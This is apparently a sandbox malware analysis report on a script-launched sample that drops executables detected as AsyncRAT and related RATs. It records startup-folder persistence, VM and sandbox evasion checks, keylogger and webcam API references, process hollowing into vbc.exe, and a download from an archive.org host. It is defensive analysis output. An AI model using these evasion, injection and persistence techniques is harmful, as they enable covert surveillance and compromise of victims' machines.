Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Yara detected AsyncRAT

Show sources

Source: Yara match	File source: 0000000C.00000000.429733559.00000000006E2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.599252774.00000000006E2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.601243946.0000000002AF1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: tmp87E4.tmp.exe PID: 5036, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe, type: DROPPED
Source: Yara match	File source: 12.0.tmp87E4.tmp.exe.6e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.tmp87E4.tmp.exe.6e0000.0.unpack, type: UNPACKEDPE

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: tmp87E4.tmp.exe, tmp87E4.tmp.exe.2.dr

Binary or memory string: SBIEDLL.DLL

Source: C:\Users\user\AppData\Local\Temp\pgr.exe

File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Source: C:\Users\user\AppData\Local\Temp\Tmp.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Source: C:\Users\user\AppData\Local\Temp\pgr.exe	Window / User API: threadDelayed 5377
Source: C:\Users\user\AppData\Local\Temp\pgr.exe	Window / User API: threadDelayed 703
Source: C:\Users\user\AppData\Roaming\servieda.exe	Window / User API: threadDelayed 5808
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe	Window / User API: threadDelayed 684
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe	Window / User API: threadDelayed 9071

Source: C:\Users\user\AppData\Local\Temp\Tmp.exe TID: 2272	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\servieda.exe TID: 4188	Thread sleep count: 5808 > 30
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe TID: 3084	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe TID: 340	Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe TID: 4148	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe TID: 4148	Thread sleep count: 90 > 30
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe TID: 476	Thread sleep count: 684 > 30
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe TID: 476	Thread sleep count: 9071 > 30
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe TID: 1236	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe TID: 4132	Thread sleep time: -120000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe TID: 5052	Thread sleep time: -140000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe TID: 3548	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe TID: 3548	Thread sleep time: -1100000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe TID: 3548	Thread sleep time: -200000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe TID: 5368	Thread sleep time: -180000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe TID: 3548	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Users\user\AppData\Local\Temp\pgr.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\servieda.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\servieda.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe

File Volume queried: C:\ FullSizeInformation

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

Code function: 14_2_00406EC3 FindFirstFileA,FindNextFileA,strlen,strlen,

Source: C:\Users\user\AppData\Local\Temp\Tmp.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Thread delayed: delay time: 120000
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Thread delayed: delay time: 140000
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Thread delayed: delay time: 100000
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Thread delayed: delay time: 100000
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Thread delayed: delay time: 922337203685477

Source: wscript.exe, 00000000.00000002.373872355.000001B866570000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAWX
Source: wscript.exe, 00000000.00000002.374755417.000001B866F40000.00000002.00000001.sdmp, servieda.exe, 00000003.00000002.610124261.000000001AF20000.00000002.00000001.sdmp, tmp87E4.tmp.exe, 0000000C.00000002.611349583.00000000054E0000.00000002.00000001.sdmp, tmpFB21.tmp.exe, 0000000D.00000002.614934785.0000000007300000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: tmp87E4.tmp.exe.2.dr	Binary or memory string: vmware
Source: Tmp.exe, 00000001.00000002.368050117.0000000000690000.00000004.00000020.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\b8b}
Source: servieda.exe, 00000003.00000002.600571668.000000000067B000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllS
Source: wscript.exe, 00000000.00000003.342673260.000001B8665AF000.00000004.00000001.sdmp, tmp87E4.tmp.exe, 0000000C.00000002.610746899.0000000005046000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW
Source: wscript.exe, 00000000.00000002.374755417.000001B866F40000.00000002.00000001.sdmp, servieda.exe, 00000003.00000002.610124261.000000001AF20000.00000002.00000001.sdmp, tmp87E4.tmp.exe, 0000000C.00000002.611349583.00000000054E0000.00000002.00000001.sdmp, tmpFB21.tmp.exe, 0000000D.00000002.614934785.0000000007300000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: wscript.exe, 00000000.00000002.374755417.000001B866F40000.00000002.00000001.sdmp, servieda.exe, 00000003.00000002.610124261.000000001AF20000.00000002.00000001.sdmp, tmp87E4.tmp.exe, 0000000C.00000002.611349583.00000000054E0000.00000002.00000001.sdmp, tmpFB21.tmp.exe, 0000000D.00000002.614934785.0000000007300000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: wscript.exe, 00000000.00000002.374755417.000001B866F40000.00000002.00000001.sdmp, servieda.exe, 00000003.00000002.610124261.000000001AF20000.00000002.00000001.sdmp, tmp87E4.tmp.exe, 0000000C.00000002.611349583.00000000054E0000.00000002.00000001.sdmp, tmpFB21.tmp.exe, 0000000D.00000002.614934785.0000000007300000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: tmpFB21.tmp.exe, 0000000D.00000002.601888472.0000000001070000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllNN

Source: C:\Users\user\AppData\Roaming\servieda.exe

Process information queried: ProcessInformation

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

Code function: 14_2_00403C3D LoadLibraryA,GetProcAddress,strcpy,

Source: C:\Users\user\AppData\Local\Temp\pgr.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\servieda.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Process token adjusted: Debug

Source: C:\Users\user\AppData\Local\Temp\Tmp.exe

Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion:

Benign windows process drops PE files

Show sources

Source: C:\Windows\System32\wscript.exe

File created: Tmp.exe.0.dr

Jump to dropped file

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\System32\wscript.exe	Domain query: ia601504.us.archive.org
Source: C:\Windows\System32\wscript.exe	Network Connect: 207.241.227.114 187

.NET source code references suspicious native API functions

Show sources

Source: Tmp.exe.0.dr, kl.cs	Reference to suspicious API methods: ('MapVirtualKey', 'MapVirtualKey@user32.dll'), ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
Source: Tmp.exe.0.dr, SlayerRAT.cs	Reference to suspicious API methods: ('capGetDriverDescriptionA', 'capGetDriverDescriptionA@avicap32.dll')
Source: servieda.exe.1.dr, SlayerRAT.cs	Reference to suspicious API methods: ('capGetDriverDescriptionA', 'capGetDriverDescriptionA@avicap32.dll')
Source: servieda.exe.1.dr, kl.cs	Reference to suspicious API methods: ('MapVirtualKey', 'MapVirtualKey@user32.dll'), ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
Source: 1.0.Tmp.exe.1d0000.0.unpack, SlayerRAT.cs	Reference to suspicious API methods: ('capGetDriverDescriptionA', 'capGetDriverDescriptionA@avicap32.dll')
Source: 1.0.Tmp.exe.1d0000.0.unpack, kl.cs	Reference to suspicious API methods: ('MapVirtualKey', 'MapVirtualKey@user32.dll'), ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
Source: 1.2.Tmp.exe.1d0000.0.unpack, SlayerRAT.cs	Reference to suspicious API methods: ('capGetDriverDescriptionA', 'capGetDriverDescriptionA@avicap32.dll')
Source: 1.2.Tmp.exe.1d0000.0.unpack, kl.cs	Reference to suspicious API methods: ('MapVirtualKey', 'MapVirtualKey@user32.dll'), ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
Source: 79c06ef4ef423d882819c4e66285ec85.exe.2.dr, OK.cs	Reference to suspicious API methods: ('capGetDriverDescriptionA', 'capGetDriverDescriptionA@avicap32.dll')
Source: 79c06ef4ef423d882819c4e66285ec85.exe.2.dr, kl.cs	Reference to suspicious API methods: ('MapVirtualKey', 'MapVirtualKey@user32.dll'), ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
Source: 2.2.pgr.exe.80000.0.unpack, OK.cs	Reference to suspicious API methods: ('capGetDriverDescriptionA', 'capGetDriverDescriptionA@avicap32.dll')
Source: 2.2.pgr.exe.80000.0.unpack, kl.cs	Reference to suspicious API methods: ('MapVirtualKey', 'MapVirtualKey@user32.dll'), ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
Source: 2.0.pgr.exe.80000.0.unpack, OK.cs	Reference to suspicious API methods: ('capGetDriverDescriptionA', 'capGetDriverDescriptionA@avicap32.dll')
Source: 2.0.pgr.exe.80000.0.unpack, kl.cs	Reference to suspicious API methods: ('MapVirtualKey', 'MapVirtualKey@user32.dll'), ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
Source: d4c6a6df7bab3dad31763de990c4ed82.exe.3.dr, SlayerRAT.cs	Reference to suspicious API methods: ('capGetDriverDescriptionA', 'capGetDriverDescriptionA@avicap32.dll')
Source: d4c6a6df7bab3dad31763de990c4ed82.exe.3.dr, kl.cs	Reference to suspicious API methods: ('MapVirtualKey', 'MapVirtualKey@user32.dll'), ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
Source: 3.2.servieda.exe.a0000.0.unpack, SlayerRAT.cs	Reference to suspicious API methods: ('capGetDriverDescriptionA', 'capGetDriverDescriptionA@avicap32.dll')
Source: 3.2.servieda.exe.a0000.0.unpack, kl.cs	Reference to suspicious API methods: ('MapVirtualKey', 'MapVirtualKey@user32.dll'), ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
Source: 3.0.servieda.exe.a0000.0.unpack, kl.cs	Reference to suspicious API methods: ('MapVirtualKey', 'MapVirtualKey@user32.dll'), ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
Source: 3.0.servieda.exe.a0000.0.unpack, SlayerRAT.cs	Reference to suspicious API methods: ('capGetDriverDescriptionA', 'capGetDriverDescriptionA@avicap32.dll')
Source: 8.2.d4c6a6df7bab3dad31763de990c4ed82.exe.a70000.0.unpack, SlayerRAT.cs	Reference to suspicious API methods: ('capGetDriverDescriptionA', 'capGetDriverDescriptionA@avicap32.dll')
Source: 8.2.d4c6a6df7bab3dad31763de990c4ed82.exe.a70000.0.unpack, kl.cs	Reference to suspicious API methods: ('MapVirtualKey', 'MapVirtualKey@user32.dll'), ('GetAsyncKeyState', 'GetAsyncKeyState@user32')

Allocates memory in foreign processes

Show sources

Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 protect: page execute and read and write

Injects a PE file into a foreign processes

Show sources

Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 value starts with: 4D5A

Sample uses process hollowing technique

Show sources

Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Section unmapped: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base address: 400000
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Section unmapped: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base address: 400000

Writes to foreign memory regions

Show sources

Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 401000
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 412000
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 416000
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 418000
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 401000
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 443000
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 44F000
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 452000

Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\Temp\Tmp.exe 'C:\Users\user\AppData\Local\Temp\Tmp.exe'
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\Temp\pgr.exe 'C:\Users\user\AppData\Local\Temp\pgr.exe'
